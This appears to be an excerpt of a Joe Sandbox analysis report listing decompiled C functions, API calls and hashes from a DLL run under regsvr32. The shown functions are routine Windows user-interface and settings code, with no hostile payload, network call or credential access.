                                                                                                            • Instruction ID: 75c5e2025475ce32d6cb8a8ad57bceb5efa69f1f793163f183f6db466388bc1f
                                                                                                            • Opcode Fuzzy Hash: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
                                                                                                            • Instruction Fuzzy Hash: 455117B1900209AFEB14CFA4C884BEEBBB9FF08355F104529E116EB655D774AA45CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 61%
                                                                                                            			E1002B9F8(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v17;
                                                                                                            				char _v18;
                                                                                                            				signed int _v19;
                                                                                                            				char _v28;
                                                                                                            				long _v32;
                                                                                                            				signed int _v36;
                                                                                                            				char _v52;
                                                                                                            				intOrPtr _t41;
                                                                                                            				intOrPtr* _t44;
                                                                                                            				signed char _t63;
                                                                                                            				intOrPtr* _t85;
                                                                                                            				intOrPtr* _t88;
                                                                                                            
                                                                                                            				_t41 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t88 = __ecx;
                                                                                                            				_push( &_v28);
                                                                                                            				_push(_a4);
                                                                                                            				_v8 = _t41;
                                                                                                            				_push(0x417);
                                                                                                            				 *((intOrPtr*)( *__ecx + 0x110))();
                                                                                                            				_t44 = _a8;
                                                                                                            				 *(_t44 + 8) =  *(_t44 + 8) ^ 0x00000004;
                                                                                                            				_v18 = 0;
                                                                                                            				_v17 = 0;
                                                                                                            				 *((char*)(_t44 + 0xa)) = 0;
                                                                                                            				 *((char*)(_t44 + 0xb)) = 0;
                                                                                                            				if(E10011FB0(_t44,  &_v28, 0x14) != 0) {
                                                                                                            					_v36 = E100202AB(_t88);
                                                                                                            					E100202DF(_t88, 0x10000000, 0, 0);
                                                                                                            					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, __edi);
                                                                                                            					_v32 = SendMessageA( *(_t88 + 0x1c), 0x43d, 0, 0);
                                                                                                            					SendMessageA( *(_t88 + 0x1c), 0xb, 0, 0);
                                                                                                            					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32 + 1, 0);
                                                                                                            					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32, 0);
                                                                                                            					SendMessageA( *(_t88 + 0x1c), 0xb, 1, 0);
                                                                                                            					_t85 = _a8;
                                                                                                            					 *((intOrPtr*)( *_t88 + 0x110))(0x415, _a4, _t85);
                                                                                                            					E100202DF(_t88, 0, _v36 & 0x10000000, 0);
                                                                                                            					_t63 =  *((intOrPtr*)(_t85 + 9));
                                                                                                            					if(((_t63 ^ _v19) & 0x00000001) != 0 || (_t63 & 0x00000001) != 0 &&  *_t85 != _v28) {
                                                                                                            						_push(1);
                                                                                                            						_push(0);
                                                                                                            						goto L7;
                                                                                                            					} else {
                                                                                                            						_push( &_v52);
                                                                                                            						_push(_a4);
                                                                                                            						_push(0x41d);
                                                                                                            						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
                                                                                                            							_push(1);
                                                                                                            							_push( &_v52);
                                                                                                            							L7:
                                                                                                            							_t45 = InvalidateRect( *(_t88 + 0x1c), ??, ??);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(_t45, _v8);
                                                                                                            			}

















                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • SendMessageA.USER32 ref: 1002BA88
                                                                                                            • SendMessageA.USER32 ref: 1002BA94
                                                                                                            • SendMessageA.USER32 ref: 1002BAA4
                                                                                                            • SendMessageA.USER32 ref: 1002BAB2
                                                                                                            • SendMessageA.USER32 ref: 1002BABC
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 1002BB26
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$InvalidateLongRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 74886174-0
                                                                                                            • Opcode ID: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                                                            • Instruction ID: d3f4ff1b3068862bce3741e6c92e476afb765aaf48ff9a7e93f31cae0c4b6ca1
                                                                                                            • Opcode Fuzzy Hash: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                                                            • Instruction Fuzzy Hash: D0416CB0600248BFEB11DB94DC95EFEBBB9EF48744F414459FA41AB291C6B0AD45CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 77%
                                                                                                            			E10030A77(void* __ecx, intOrPtr __edx) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				struct tagMSG _v32;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t30;
                                                                                                            				void* _t32;
                                                                                                            				void* _t34;
                                                                                                            				void* _t36;
                                                                                                            				intOrPtr* _t37;
                                                                                                            				void* _t41;
                                                                                                            				intOrPtr _t55;
                                                                                                            				void* _t56;
                                                                                                            				void* _t57;
                                                                                                            				void* _t60;
                                                                                                            				void* _t61;
                                                                                                            				intOrPtr* _t62;
                                                                                                            
                                                                                                            				_t58 = __edx;
                                                                                                            				_t60 = __ecx;
                                                                                                            				if(GetCapture() != 0) {
                                                                                                            					L20:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				E100220EE(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
                                                                                                            				if(E100220EE(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
                                                                                                            					L19:
                                                                                                            					E100308EB(_t60, _t72);
                                                                                                            					goto L20;
                                                                                                            				} else {
                                                                                                            					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                                                                                            						_t30 = _v32.message - 0x100;
                                                                                                            						if(_t30 == 0) {
                                                                                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                                                            							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
                                                                                                            								E1003075A(_t60, _v32.wParam, 1);
                                                                                                            							}
                                                                                                            							__eflags = _v32.wParam - 0x1b;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								L18:
                                                                                                            								_t32 = E100220EE(_t61, GetCapture());
                                                                                                            								_t72 = _t32 -  *((intOrPtr*)(_t60 + 0x68));
                                                                                                            								if(_t32 ==  *((intOrPtr*)(_t60 + 0x68))) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L19;
                                                                                                            						}
                                                                                                            						_t34 = _t30 - 1;
                                                                                                            						if(_t34 == 0) {
                                                                                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                                                            							if(__eflags != 0) {
                                                                                                            								E1003075A(_t60, _v32.wParam, 0);
                                                                                                            							}
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						_t36 = _t34 - 0xff;
                                                                                                            						if(_t36 == 0) {
                                                                                                            							_t55 = _v32.pt;
                                                                                                            							_t58 = _v8;
                                                                                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                                                            							_push(_t55);
                                                                                                            							_push(_t55);
                                                                                                            							_t37 = _t62;
                                                                                                            							 *_t37 = _t55;
                                                                                                            							 *((intOrPtr*)(_t37 + 4)) = _v8;
                                                                                                            							_t56 = _t60;
                                                                                                            							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
                                                                                                            								E1003078E(_t56, 0);
                                                                                                            							} else {
                                                                                                            								E100306DB(_t56);
                                                                                                            							}
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						_t41 = _t36;
                                                                                                            						if(_t41 == 0) {
                                                                                                            							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                                                            							_t57 = _t60;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								E10030A33(_t61, __eflags);
                                                                                                            							} else {
                                                                                                            								E10030930(_t57, _t58, 0, _t60, __eflags);
                                                                                                            							}
                                                                                                            							return 1;
                                                                                                            						}
                                                                                                            						if(_t41 == 0) {
                                                                                                            							goto L19;
                                                                                                            						}
                                                                                                            						DispatchMessageA( &_v32);
                                                                                                            						goto L18;
                                                                                                            					}
                                                                                                            					_push(_v32.wParam);
                                                                                                            					E1003A098();
                                                                                                            					goto L19;
                                                                                                            				}
                                                                                                            			}




















                                                                                                            0x10030b2d
                                                                                                            0x10030b2d
                                                                                                            0x00000000
                                                                                                            0x10030b25
                                                                                                            0x10030ad9
                                                                                                            0x10030ade
                                                                                                            0x10030af8
                                                                                                            0x10030afb
                                                                                                            0x10030afe
                                                                                                            0x10030b04
                                                                                                            0x10030b05
                                                                                                            0x10030b06
                                                                                                            0x10030b08
                                                                                                            0x10030b0a
                                                                                                            0x10030b0d
                                                                                                            0x10030b0f
                                                                                                            0x10030b18
                                                                                                            0x10030b11
                                                                                                            0x10030b11
                                                                                                            0x10030b11
                                                                                                            0x00000000
                                                                                                            0x10030b0f
                                                                                                            0x10030ae1
                                                                                                            0x10030ae2
                                                                                                            0x10030b77
                                                                                                            0x10030b7d
                                                                                                            0x10030b7f
                                                                                                            0x10030b88
                                                                                                            0x10030b81
                                                                                                            0x10030b81
                                                                                                            0x10030b81
                                                                                                            0x00000000
                                                                                                            0x10030b8f
                                                                                                            0x10030aea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10030af0
                                                                                                            0x00000000
                                                                                                            0x10030af0
                                                                                                            0x10030b6d
                                                                                                            0x10030b70
                                                                                                            0x00000000
                                                                                                            0x10030b70

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Capture$Message$Dispatch
                                                                                                            • String ID:
                                                                                                            • API String ID: 3654672037-0
                                                                                                            • Opcode ID: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                                                            • Instruction ID: d9b79505f63fc07e8b5b8f3565facbd5cf555a7e12dc77f8d6b56f2636bb58fe
                                                                                                            • Opcode Fuzzy Hash: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                                                            • Instruction Fuzzy Hash: 8431B434A02609AFCB63DBB58C65D6FF6E8EF80787F104419B445DA163CB30A980D762
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002A1CA(void* __ecx) {
                                                                                                            				struct HACCEL__* _t25;
                                                                                                            				void* _t44;
                                                                                                            				void* _t45;
                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                            				struct HINSTANCE__* _t47;
                                                                                                            				struct HINSTANCE__* _t48;
                                                                                                            
                                                                                                            				_t44 = __ecx;
                                                                                                            				_t40 = __ecx + 0x60;
                                                                                                            				_t25 =  *(__ecx + 0x60);
                                                                                                            				_t45 = 0;
                                                                                                            				if( *((intOrPtr*)(_t25 - 0xc)) == 0) {
                                                                                                            					_t25 = E10006A60(_t40,  *((intOrPtr*)(__ecx + 0x3c)));
                                                                                                            				}
                                                                                                            				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {
                                                                                                            					_t48 =  *(E100373B5() + 0xc);
                                                                                                            					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
                                                                                                            					_t25 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
                                                                                                            					 *(_t44 + 0x30) = _t25;
                                                                                                            					_t45 = 0;
                                                                                                            				}
                                                                                                            				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {
                                                                                                            					_t47 =  *(E100373B5() + 0xc);
                                                                                                            					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
                                                                                                            					_t25 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
                                                                                                            					 *(_t44 + 0x38) = _t25;
                                                                                                            					_t45 = 0;
                                                                                                            				}
                                                                                                            				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {
                                                                                                            					_t46 =  *(E100373B5() + 0xc);
                                                                                                            					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
                                                                                                            					_t25 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
                                                                                                            					 *(_t44 + 0x28) = _t25;
                                                                                                            				}
                                                                                                            				return _t25;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$AcceleratorsMenu
                                                                                                            • String ID:
                                                                                                            • API String ID: 144087665-0
                                                                                                            • Opcode ID: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                                                            • Instruction ID: 79ec512449ce6a4c7bf2710ae8ff5bed15bebc86ac40dbf708adfd4365bfde7a
                                                                                                            • Opcode Fuzzy Hash: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                                                            • Instruction Fuzzy Hash: 8821EA75401B18DFC3B0EF6A9940937F3F8FF09651751446FEA8A86912DA36F890DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B105(struct HWND__* _a4, struct HWND__** _a8) {
                                                                                                            				struct HWND__* _t7;
                                                                                                            				void* _t13;
                                                                                                            				struct HWND__** _t15;
                                                                                                            				struct HWND__* _t16;
                                                                                                            				struct HWND__* _t17;
                                                                                                            				struct HWND__* _t18;
                                                                                                            
                                                                                                            				_t18 = _a4;
                                                                                                            				_t17 = _t18;
                                                                                                            				if(_t18 != 0) {
                                                                                                            					L5:
                                                                                                            					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                            						L8:
                                                                                                            						_t16 = _t17;
                                                                                                            						_t7 = _t17;
                                                                                                            						if(_t17 == 0) {
                                                                                                            							L10:
                                                                                                            							if(_t18 == 0 && _t17 != 0) {
                                                                                                            								_t17 = GetLastActivePopup(_t17);
                                                                                                            							}
                                                                                                            							_t15 = _a8;
                                                                                                            							if(_t15 != 0) {
                                                                                                            								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                                                                            									 *_t15 =  *_t15 & 0x00000000;
                                                                                                            								} else {
                                                                                                            									 *_t15 = _t16;
                                                                                                            									EnableWindow(_t16, 0);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							return _t17;
                                                                                                            						} else {
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L9:
                                                                                                            							_t16 = _t7;
                                                                                                            							_t7 = GetParent(_t7);
                                                                                                            						} while (_t7 != 0);
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            					_t17 = GetParent(_t17);
                                                                                                            					L7:
                                                                                                            					if(_t17 != 0) {
                                                                                                            						goto L5;
                                                                                                            					}
                                                                                                            					goto L8;
                                                                                                            				}
                                                                                                            				_t13 = E1002B0CC();
                                                                                                            				if(_t13 != 0) {
                                                                                                            					L4:
                                                                                                            					_t17 =  *(_t13 + 0x1c);
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				_t13 = E10006C53();
                                                                                                            				if(_t13 != 0) {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				_t17 = 0;
                                                                                                            				goto L8;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                            • String ID:
                                                                                                            • API String ID: 670545878-0
                                                                                                            • Opcode ID: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                                                            • Instruction ID: ef498eb2053f32fc83163eb1be06eb9c016c70d7a0359ba6d8f1e9348af6cf1d
                                                                                                            • Opcode Fuzzy Hash: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                                                            • Instruction Fuzzy Hash: E111A332601F764FD362DA6AACA4B2B77DCDF41BD1FD20159EC04D7211DB60EC104290
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B501(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
                                                                                                            				long _t21;
                                                                                                            				void* _t28;
                                                                                                            
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
                                                                                                            					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x64));
                                                                                                            				}
                                                                                                            				if(_a8 != 0) {
                                                                                                            					_t28 = E10035959(__ecx, _a4);
                                                                                                            					if(_a12 != 0) {
                                                                                                            						if(_t28 == 0) {
                                                                                                            							L3:
                                                                                                            							return 0;
                                                                                                            						}
                                                                                                            						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
                                                                                                            						L10:
                                                                                                            						RegCloseKey(_t28);
                                                                                                            						return 0 | _t21 == 0x00000000;
                                                                                                            					}
                                                                                                            					if(_t28 == 0) {
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            					_t21 = RegDeleteValueA(_t28, _a8);
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            				_t28 = E100358C8(__ecx);
                                                                                                            				if(_t28 != 0) {
                                                                                                            					_t21 = RegDeleteKeyA(_t28, _a4);
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            				goto L3;
                                                                                                            			}






                                                                                                            APIs
                                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1002B525
                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 1002B545
                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10024C29,?), ref: 1002B570
                                                                                                              • Part of subcall function 100358C8: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                                                              • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                                                              • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                                                              • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                                                              • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B58B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 1886894508-0
                                                                                                            • Opcode ID: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                                                            • Instruction ID: c8f527a64b8234d0edd8db9930868310c0db2fd70ee1d53d59517915cf010f6f
                                                                                                            • Opcode Fuzzy Hash: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                                                            • Instruction Fuzzy Hash: D1114832401E79FFDB128F61DC48F9E3BA9EF043A1F814510FD049D061CB328A61AB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 46%
                                                                                                            			E10031F4A(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v528;
                                                                                                            				void* _v532;
                                                                                                            				char _v536;
                                                                                                            				intOrPtr _t15;
                                                                                                            				long _t22;
                                                                                                            				void* _t25;
                                                                                                            				void* _t29;
                                                                                                            
                                                                                                            				_t15 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t15;
                                                                                                            				_push( &_v532);
                                                                                                            				_push( &_v536);
                                                                                                            				_push(_a8);
                                                                                                            				_push(0x3e8);
                                                                                                            				_t29 = __ecx;
                                                                                                            				L1001CA38();
                                                                                                            				if(lstrlenA(GlobalLock(_v532)) < 0x208) {
                                                                                                            					_t22 = GlobalUnlock(_v532);
                                                                                                            					_push(_v532);
                                                                                                            					_push(0x8000);
                                                                                                            					_push(0x3e4);
                                                                                                            					_push(0x3e8);
                                                                                                            					_push(_a8);
                                                                                                            					L1001CA32();
                                                                                                            					PostMessageA(_a4, 0x3e4,  *(_t29 + 0x1c), _t22);
                                                                                                            					if(E100203CE(_t29) != 0) {
                                                                                                            						_t25 = E100373B5();
                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)))) + 0xa0))( &_v528);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(0, _v8);
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 10031F76
                                                                                                            • GlobalLock.KERNEL32 ref: 10031F81
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10031F88
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 10031F9C
                                                                                                            • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10031FB7
                                                                                                            • PostMessageA.USER32 ref: 10031FC4
                                                                                                              • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 462239228-0
                                                                                                            • Opcode ID: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                                                            • Instruction ID: bfbb9d00b13f65a0ab326070f2ebd1bafe94df8b281a4b7973d805b3987b007f
                                                                                                            • Opcode Fuzzy Hash: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                                                            • Instruction Fuzzy Hash: 8D111C3554121CAFDB12DFA1DC88DDE7BB9FF55351F0045A5F809EA262DA34DE808B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10029BA4(struct HWND__* _a4) {
                                                                                                            				struct HWND__* _t3;
                                                                                                            				struct HWND__* _t6;
                                                                                                            				struct HWND__* _t11;
                                                                                                            				struct HWND__* _t14;
                                                                                                            
                                                                                                            				_t3 = GetFocus();
                                                                                                            				_t14 = _t3;
                                                                                                            				if(_t14 != 0) {
                                                                                                            					_t11 = _a4;
                                                                                                            					if(_t14 == _t11) {
                                                                                                            						L10:
                                                                                                            						return _t3;
                                                                                                            					}
                                                                                                            					if(E10029A8E(_t14, 3) != 0) {
                                                                                                            						L5:
                                                                                                            						if(_t11 == 0 || (GetWindowLongA(_t11, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                            							L8:
                                                                                                            							_t3 = SendMessageA(_t14, 0x14f, 0, 0);
                                                                                                            							goto L9;
                                                                                                            						} else {
                                                                                                            							_t6 = GetParent(_t11);
                                                                                                            							_t3 = GetDesktopWindow();
                                                                                                            							if(_t6 == _t3) {
                                                                                                            								L9:
                                                                                                            								goto L10;
                                                                                                            							}
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t3 = GetParent(_t14);
                                                                                                            					_t14 = _t3;
                                                                                                            					if(_t14 == _t11) {
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					_t3 = E10029A8E(_t14, 2);
                                                                                                            					if(_t3 == 0) {
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					goto L5;
                                                                                                            				}
                                                                                                            				return _t3;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetFocus.USER32(?,10032120,?), ref: 10029BA5
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            • GetParent.USER32(00000000), ref: 10029BCE
                                                                                                              • Part of subcall function 10029A8E: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                                                              • Part of subcall function 10029A8E: lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                                                            • GetWindowLongA.USER32 ref: 10029BE9
                                                                                                            • GetParent.USER32(10032120), ref: 10029BF7
                                                                                                            • GetDesktopWindow.USER32 ref: 10029BFB
                                                                                                            • SendMessageA.USER32 ref: 10029C0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
